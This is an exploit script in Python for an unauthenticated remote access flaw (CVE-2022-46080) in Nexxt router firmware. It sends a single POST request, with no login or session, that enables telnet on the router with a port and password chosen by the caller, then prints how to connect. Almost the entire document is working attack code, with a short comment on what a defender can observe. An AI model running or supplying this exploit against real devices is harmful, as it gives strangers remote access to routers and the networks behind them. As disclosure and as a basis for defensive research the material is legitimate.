# Exploit Title: Nexxt Router Firmware 15.03.06.60 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 24/11/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 15.03.06.60
# Tested on: Nexxt Nebula 1200-AC
# CVE : CVE-2022-46080
import requests
import sys
# Module-level defaults: base URL of the router's web interface (a private
# LAN address), the telnet port to configure, and the telnet password to set.
# All three are kept as strings.
router_host = "http://192.168.0.1"
port = "25"
pw = "password"
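def main():
    """Parse the command line, send the request and report the outcome.

    Usage: ``HOST_URL PORT PASSWORD_TO_SET``. With ``-h``/``--help`` the usage
    line is printed and the process exits with status 0. When fewer than three
    positional arguments are given, the module-level ``router_host``, ``port``
    and ``pw`` values are used.
    """
    if '-h' in sys.argv or '--help' in sys.argv:
        print(f"Usage: {sys.argv[0]} HOST_URL PORT PASSWORD_TO_SET")
        sys.exit(0)

    # Read the module-level defaults into separate local names. Assigning to
    # router_host/pw/port inside this function made them function-local, so a
    # run without arguments failed with UnboundLocalError instead of using
    # the defaults.
    host, telnet_port, password = router_host, port, pw
    if len(sys.argv) > 3:
        # Argument order on the command line is HOST_URL PORT PASSWORD_TO_SET.
        host, telnet_port, password = sys.argv[1], sys.argv[2], sys.argv[3]

    if send_payload(host, telnet_port, password):
        # Strip the scheme ("http://") so only host[:port] is shown to telnet.
        print(f"connect to router using: `telnet {host.split('//')[1]} {telnet_port}` with password: {password}")
    else:
        print("An error occurred :(")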
def send_payload(h, p, pw):
    """POST a telnet configuration to the router and report whether it was accepted.

    The form sets ``telnetEn`` to 1 and passes ``telnetPwd`` / ``telnetPort``
    as strings to ``/goform/SetTelnetCfg``. The request carries no credentials
    or session cookie, which is why the advisory classes the issue as
    unauthenticated.

    Defender's view: a POST to this path from a client that is not an
    administrator's browser, or a telnet service appearing on the device, are
    the observable signs of this request having been made.

    Args:
        h: Base URL of the router, including the scheme.
        p: Telnet port to configure (converted with ``str``).
        pw: Telnet password to set (converted with ``str``).

    Returns:
        True if the decoded response body contains ``errCode":0``, else False.
    """
    endpoint = h + "/goform/SetTelnetCfg?reasy-ui-1.0.3.js"
    form = {"telnetEn": 1, "telnetPwd": str(pw), "telnetPort": str(p)}
    reply = requests.post(endpoint, data=form)
    body = reply.content.decode()
    # The firmware signals success with a zero error code in the reply body.
    return 'errCode":0' in body
# Run main() only when executed as a script, not when imported.
if __name__ == "__main__":
    main()